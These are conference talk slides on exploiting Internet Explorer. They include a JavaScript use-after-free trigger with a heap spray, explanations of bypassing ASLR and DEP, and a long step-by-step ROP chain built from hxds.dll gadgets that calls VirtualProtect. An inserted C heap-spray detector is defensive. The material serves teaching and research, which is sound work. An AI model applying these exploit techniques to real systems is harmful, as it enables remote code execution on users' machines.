A Day-Old Puppy Doesn't Know to Fear IE (하룻강아지가 IE 무서운 줄 모른다, a play on the Korean proverb about the puppy that doesn't know to fear the tiger)
Yoonho Kim (UknowY)
20140819_Inc0gnito
Who Am I?
• Hanyang University ICEWALL
• BoB 3rd
• ㅎㅎ Union
(pretending to be close friends)
Why Browser?
• Hot – predominant desktop app.
• Effective – Tech shifting towards client side
• Complexity – lots of bugs
• $$$
Hot
Effective
Complexity
Complexity
Complexity – Rendering Engine
• HTML Parsing
• CSS Parsing
• Image Decoding
• JavaScript Interpreter
• Regular Expressions
• Document Object Model
• Layout and Rendering
• SVG (Scalable Vector Graphics)
• XML Parsing
• XSLT (Extensible Stylesheet Language Transformation)
Complexity – Browser Kernel
• Cookie Database
• History Database
• Password Database
• Window Management
• Location Bar
• Safe Browsing Blacklist
• Network Stack
• SSL / TLS Functionality
• Disk Cache
• Download Manager and Clipboard
• Mozilla since 2004
  • t-shirt + $500 - $3,000
• Google since 2010
  • Typical security bugs $1,000 - $5,000
  • Possibility for bonus rewards (PoC, exploit, awesomeness)
• Microsoft 2013
  • IE11 preview (June 26 - July 26): $500 - $11,000
  • BlueHat Bonus for Defense: ~$50,000
  • Mitigation Bypass Bounty: ~$100,000
$$$
• CanSecWest 2014 with Zero Day Initiative, HP ...
• Browser
  • Google Chrome on Windows 8.1 x64: $100,000
  • Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000
  • Mozilla Firefox on Windows 8.1 x64: $50,000
  • Apple Safari on OS X Mavericks: $65,000
• "Exploit Unicorn" Grand Prize:
  • SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000*
Pwn2Own 2014 for $$$
Oh nice (lol)
Internet explorer
CVE
Exploit Pack
Touch Sleeping Lion Coter
SW Bugs => Bypass ASLR/DEP => Exploit!
How to Damn it?
• mshtml.dll for HTML / Rendering
  • DOM-related memory allocation and management
• jscript.dll for JavaScript
  • JavaScript object memory allocation and management
• jscript9.dll
  • replaces jscript.dll from IE9 onward
Where the Bugs?
• msxml.dll for XML
• vgx.dll for VML
• Silverlight
• SWF
• ActiveX
pf) Java Applet
Where the Bugs?
VGX.dll Vuln. for VML (Vector Markup Language)
• Heap/Stack/Global buffer overflow
• Use-after-free
• Type Confusion
• Format String Bugs
• Race Condition
• ...
=> Memory Corruption Bugs!
What kind of Bugs?
• Literally: a vulnerability that arises when memory that has already been freed is used again
• The hottest bug class lately
• dangling pointer
• Usually combined with a heap spray
Use After Free
<body><textarea id="UknowY"> Hell Inc0gnito </textarea></body>

var e1 = document.getElementsByTagName("textarea")[0];   // first reference to the textarea object
var e2 = document.getElementById("UknowY");               // second reference to the same object
e2.parentNode.removeChild(e2);                            // object freed; e1 still refers to it (dangling)
var S = new String("\u3138\u3138");
for (var i = 0; i < 20000; i++) S += "\u3138\u3138";      // spray string: bytes 38 31 38 31 ... in memory
e1.innerHTML = S;                                         // use through the dangling reference
[Figure, three stages of the textarea object: (1) e1 and e2 both point to the live textarea object, whose first field is its vtable pointer; (2) after removeChild the object's memory is freed (shown as xxxxxxxx) while the references still point at it; (3) after the spray the same memory holds the string S (31383138 31383138 ...), so a use through the dangling reference reads attacker-controlled data.]
Use After Free
• CrossFuzz (2011)
• Nduja fuzzer (2012)
• NodeFuzz (2013)
• ClusterFuzz (2012)
• Smashing the Browser (Hitcon 2014)
  • https://github.com/demi6od/Smashing_The_Browser
How to get Bugs?
• Heap Spray[~IE7]
• Heap Feng Shui(HeapLib)[~IE8]
• Precise Heap Spray[~IE9]
Bypass ASLR
[Figure: the heap filled with many repeated NOPS + Shellcode blocks (... < MORE > ...); a hijacked EIP landing anywhere in a NOP sled slides into the shellcode.]
Heap Spray
Heap Structure
!peb
!heap
dt _HEAP 0x00150000
dt _HEAP_SEGMENT 0x00150540
dt _HEAP_ENTRY 0x00240000
Heap Feng Shui / HeapLib
• Feng shui for the heap: put the allocation right on the best spot
• Unlike a heap spray: "calculate precisely and land it in one shot"
• HeapLib: a library that packages the heap-spray-related primitives
Heap Feng Shui / HeapLib
• IE8 ~ : DEP defaults
• NOP(\x90) is meaningless
• Nozzle/Bubble detect same content
• set stack with stack pivot
Precise Heap Spray
Precise Heap Spray
Precise Heap Spray
Spray Well
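The "Nozzle/Bubble detect same content" bullet above is the defender's side of heap spraying: a sprayed heap is full of blocks that consist almost entirely of one repeated word (a NOP sled, or the 31383138 pattern left by the string S). The C program below, added here as an illustration and not code from the talk, implements that heuristic over a byte buffer: it finds the longest run of an identical 32-bit word and flags the block when that run dominates it. The two sample buffers (960 words of the UTF-16LE "\u3138" pattern with a short varied tail, and a fragment of ordinary HTML) are constructed for the demonstration, and the 90% threshold is an assumed tuning value.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result of scanning a region: the longest run of one repeated 32-bit word. */
typedef struct {
    size_t   run_words;   /* length of the longest run, in 4-byte words */
    uint32_t value;       /* the repeated word */
    size_t   offset;      /* byte offset where the run starts */
} spray_run;

/* Read a 32-bit word from possibly unaligned bytes, in host byte order. */
static uint32_t word_at(const uint8_t *p) {
    uint32_t w;
    memcpy(&w, p, sizeof w);
    return w;
}

/* Scan a buffer for the longest run of identical consecutive words (trailing bytes ignored). */
static spray_run longest_repeated_run(const uint8_t *buf, size_t len) {
    spray_run best = {0, 0, 0};
    size_t nwords = len / 4;
    if (nwords == 0) return best;
    uint32_t prev = word_at(buf);
    size_t run = 1, start = 0;
    for (size_t i = 1; i <= nwords; i++) {
        if (i < nwords && word_at(buf + 4 * i) == prev) { run++; continue; }
        if (run > best.run_words) { best.run_words = run; best.value = prev; best.offset = start * 4; }
        if (i < nwords) { prev = word_at(buf + 4 * i); run = 1; start = i; }
    }
    return best;
}

/* Fraction of the buffer covered by its longest repeated-word run (0.0 .. 1.0). */
static double repeated_fraction(const uint8_t *buf, size_t len) {
    if (len == 0) return 0.0;
    return (double)(longest_repeated_run(buf, len).run_words * 4) / (double)len;
}

/* Nozzle-style verdict: a block dominated by one repeated word is a spray/sled candidate. */
static int looks_like_spray(const uint8_t *buf, size_t len, double min_fraction) {
    return repeated_fraction(buf, len) >= min_fraction;
}

/* Constructed sample: 960 words of the slide's pattern (UTF-16LE "\u3138" -> bytes 38 31 38 31)
   followed by 64 bytes of varied filler standing in for the non-repeating tail of a sprayed block. */
static size_t build_spray_sample(uint8_t *out, size_t cap) {
    const size_t pattern_bytes = 960 * 4, tail_bytes = 64;
    if (cap < pattern_bytes + tail_bytes) return 0;
    for (size_t i = 0; i < pattern_bytes; i += 2) { out[i] = 0x38; out[i + 1] = 0x31; }
    uint32_t x = 0x12345678u;                    /* tiny LCG so every tail word differs from the last */
    for (size_t i = 0; i < tail_bytes; i += 4) {
        x = x * 1103515245u + 12345u;
        memcpy(out + pattern_bytes + i, &x, 4);
    }
    return pattern_bytes + tail_bytes;
}

/* Constructed sample of ordinary page content for comparison. */
static size_t build_benign_sample(uint8_t *out, size_t cap) {
    const char *text = "<!DOCTYPE html><html><head><title>Inc0gnito 2014</title></head>"
                       "<body><p>Hello, world</p></body></html>";
    size_t n = strlen(text);
    if (cap < n) return 0;
    memcpy(out, text, n);
    return n;
}

int main(void) {
    uint8_t buf[4096];
    size_t n = build_spray_sample(buf, sizeof buf);
    spray_run r = longest_repeated_run(buf, n);
    printf("spray sample : run of %zu words of %08x at +%zu (%.1f%% of block) -> %s\n",
           r.run_words, (unsigned)r.value, r.offset, 100.0 * repeated_fraction(buf, n),
           looks_like_spray(buf, n, 0.9) ? "SPRAY" : "ok");
    n = build_benign_sample(buf, sizeof buf);
    r = longest_repeated_run(buf, n);
    printf("benign sample: run of %zu words (%.1f%% of block) -> %s\n",
           r.run_words, 100.0 * repeated_fraction(buf, n),
           looks_like_spray(buf, n, 0.9) ? "SPRAY" : "ok");
    return 0;
}
```

The heuristic is what makes the talk's point at "NOP(\x90) is meaningless" and "Nozzle/Bubble detect same content": a spray has to be large and uniform to be reliable, and that uniformity is exactly what a scanner walking the heap can measure. Real detectors add per-block sampling and a global heap-health metric on top of this single-block test.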
• ROP with non-ASLR Module
• ROP with third-party non-ASLR Module
• ROP with Memory Leak Vuln
Bypass DEP
Return Oriented Programming
• Change the execute permission of the memory region itself
  • VirtualProtect(PAGE_EXECUTE_READWRITE)
• Change the DEP policy of the current process itself
  • SetProcessDEPPolicy()
  • NtSetInformationProcess()
• Allocate new memory with execute permission and copy the shellcode into it
  • VirtualAlloc(MEM_COMMIT, PAGE_EXECUTE_READWRITE) + copy memory
  • HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) + HeapAlloc() + copy memory
• Copy the shellcode into a region that is both writable and executable, then run it
  • WriteProcessMemory()
• JRE 1.6.x
• Microsoft Office 2007/2010 - hxds.dll
• Skype4com protocol handler
• use RTF 0-day: MSCOMCTL.OCX
• mona.py (from Corelan)
• http://redmine.corelan.be/projects/mona
ROP with third-party Module
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX
ECX
EDX
EBX
ESP 0x0012120c
EBP
ESI
EDI
Return Oriented Programming
0xXXXXXXXX: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX
ECX
EDX
EBX
ESP 0x00121210
EBP
ESI
EDI
Return Oriented Programming
0x51c433d7: POP EAX 0x51c433d8: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX 0xXXXXX100
ECX
EDX
EBX
ESP 0x00121214
EBP
ESI
EDI
Return Oriented Programming
0x51c433d7: POP EAX 0x51c433d8: RETN ( == POP EIP, JMP EIP)
0x00121204: 41414141
0x00121208: 41414141
0x0012120c: 0x51c433d7, # POP EAX # RETN
0x00121210: 0xXXXXX100 # payload
0x00121214: 0x51c12345 # XCHG EAX, ESP #RETN
0x00121218
0x0012121c
...
Register Value
EAX 0xXXXXX100
ECX
EDX
EBX
ESP 0x00121218
EBP
ESI
EDI
Return Oriented Programming
0x51c12345: XCHG EAX, ESP 0x51c12346: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX 0x00121218
ECX
EDX
EBX
ESP 0xXXXXX100
EBP
ESI
EDI
Return Oriented Programming
0x51c12345: XCHG EAX, ESP 0x51c12346: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x104
EBP
ESI
EDI
Return Oriented Programming
0x51be25dc: POP EDI 0x51be25dd: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x108
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51be25dc: POP EDI 0x51be25dd: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x10c
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c3098e: MOV EAX,DWORD PTR DS:[EDI] 0x51c30990: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX VirtualProtect()
ECX
EDX
EBX
ESP 0x10c
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c3098e: MOV EAX,DWORD PTR DS:[EDI] 0x51c30990: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX VirtualProtect()
ECX
EDX
EBX
ESP 0x110
EBP
ESI
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c39987: XCHG EAX,ESI 0x51c39988: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x110
EBP
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x51c39987: XCHG EAX,ESI 0x51c39988: RETN ( == POP EIP, JMP EIP)
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX
ESP 0x110 / 0x114
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX
EBX 0x00000201
ESP 0x118 / 0x11c
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX
EDX 0x00000040
EBX 0x00000201
ESP 0x120 / 0x124
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x128 / 0x12c
EBP & call esp
ESI VirtualProtect()
EDI ptr to &VirtualProtect()
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x130 / 0x134
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x138 / 0x13c
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51bfa969, # POP EDX # RETN [hxds.dll]
0x124: 0x00000040, # 0x00000040-> edx
0x128: 0x51c385a2, # POP ECX # RETN [hxds.dll]
0x12c: 0x51c5b991, # &Writable location [hxds.dll]
0x130: 0x51bf7b52, # POP EDI # RETN [hxds.dll]
0x134: 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
0x138: 0x51c433d7, # POP EAX # RETN [hxds.dll]
0x13c: 0x90909090, # nop
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
EAX Nop (0x90909090)
ECX &Writable location (0x51c5b991)
EDX 0x00000040
EBX 0x00000201
ESP 0x140
EBP & call esp
ESI VirtualProtect()
EDI RETN (ROP NOP)
Return Oriented Programming
0x100: 0x51be25dc, # POP EDI # RETN [hxds.dll]
0x104: 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
0x108: 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
0x10c: 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
0x110: 0x51bf1761, # POP EBP # RETN [hxds.dll]
0x114: 0x51c4b2df, # & call esp [hxds.dll]
0x118: 0x51bf2e19, # POP EBX # RETN [hxds.dll]
0x11c: 0x00000201, # 0x00000201-> ebx
0x120: 0x51c3f011, # RETN (ROP NOP) -> EDI
0x124: 0xXXXXXXXX, # VirtualProtect()->ESI
0x128: 0x51c4b2df, # & call esp -> EBP
0x12c: 0xXXXXX140, # 0x140 -> ESP
0x130: 0x00000201, # 0x00000201 -> EBX
0x134: 0x00000040, # 0x00000040 -> EDX
0x138: 0x51c5b991, # &Writable location -> ECX
0x13c: 0x90909090, # Nop -> EAX
0x140: 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]
Register Value
